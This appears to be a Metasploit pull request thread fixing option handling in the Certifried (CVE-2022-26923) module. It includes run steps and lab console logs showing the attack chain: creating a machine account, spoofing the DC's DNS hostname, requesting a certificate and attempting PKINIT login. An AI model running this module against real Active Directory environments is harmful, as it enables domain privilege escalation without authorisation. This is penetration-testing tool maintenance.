Fix the cve_2022_26923_certifried module after the datastore option changes

[cdelafuente-r7]

This fixes #20249.

The cve_2022_26923_certifried module needed to be updated to account for the datastore option name created in #19606. The fix simply deregisters the new option names, which keeps the original behavior for this module and maintains consistency between the documentation and the datastore options.

Users can still use the USERNAME, PASSWORD, and DOMAIN options, which will be used for both SMB and LDAP authentication. This is possible because these options are declared as fallbacks for both protocols.

This also fixes an option key value when calling #delete_account, which is now different after the changes mentioned above.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use admin/dcerpc/cve_2022_26923_certifried
• show options
• verify the LDAPUsername, LDAPPassword and LDAPDomain options are not there.
• run verbose=true rhosts=<remote host> username=<username> password=<password> domain=<domain> dc_name=<DC hostname> ca=<CA name>
• Verify it works as expected.

[smcintyre-r7]

Before this change, stack trace:

msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.159.10
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[+] 192.168.159.10:445 - Successfully created msflab.local\DESKTOP-2CNON5ZP$
[+] 192.168.159.10:445 -   Password: fAvaaS4nBhWbivThKRuZU1MWyERtYmWH
[+] 192.168.159.10:445 -   SID:      S-1-5-21-3978004297-3499718965-4169012971-2108
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[*] 192.168.159.10:445 - Attempting to set the DNS hostname for the computer DESKTOP-2CNON5ZP$ to the DNS hostname for the DC: dc
[+] 192.168.159.10:445 - Successfully changed the DNS hostname
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 - Certificate DNS: DC.msflab.local
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20250605130635_default_192.168.159.10_windows.ad.cs_715716.pfx
[*] 192.168.159.10:445 - Attempting PKINIT login for [email protected]
[-] 192.168.159.10:445 - Failed: Kerberos Error - KDC_ERR_CERTIFICATE_MISMATCH (66) - PKINIT - KDC_ERR_CERTIFICATE_MISMATCH, Target system is likely not vulnerable to Certifried
[*] 192.168.159.10:445 - Deleting the computer account DESKTOP-2CNON5ZP$
[-] 192.168.159.10:445 - Auxiliary failed: Msf::Exploit::Remote::MsSamr::MsSamrBadConfigError Unable to delete the account since its name is unknown
[-] 192.168.159.10:445 - Call stack:
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/core/exploit/remote/ms_samr/account.rb:135:in `delete_account'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:176:in `ensure in run'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:180:in `run'
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >

After this change, no stack trace:

msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.159.10
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[!] 192.168.159.10:445 - Received no result when trying to obtain ms-DS-MachineAccountQuota. Adding a computer account may not work.
[+] 192.168.159.10:445 - Successfully created msflab.local\DESKTOP-TKVEIOFW$
[+] 192.168.159.10:445 -   Password: tbUlPpP79hlYze8PJwg9sWkihX6coWMW
[+] 192.168.159.10:445 -   SID:      S-1-5-21-3978004297-3499718965-4169012971-2107
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[*] 192.168.159.10:445 - Attempting to set the DNS hostname for the computer DESKTOP-TKVEIOFW$ to the DNS hostname for the DC: dc
[+] 192.168.159.10:445 - Successfully changed the DNS hostname
[-] 192.168.159.10:445 - There was an error while requesting the certificate.
[-] 192.168.159.10:445 - Denied by Policy Module
[-] 192.168.159.10:445 - Error details:
[-] 192.168.159.10:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 192.168.159.10:445 -   HRESULT: (0x8009480f) CERTSRV_E_SUBJECT_DNS_REQUIRED: The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name.
[*] 192.168.159.10:445 - Deleting the computer account DESKTOP-TKVEIOFW$
[+] 192.168.159.10:445 - The specified account has been deleted.
[-] 192.168.159.10:445 - Auxiliary aborted due to failure: unknown: The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >

[smcintyre-r7]

Release Notes

This fixes an issue in the certifried module that was causing it to crash.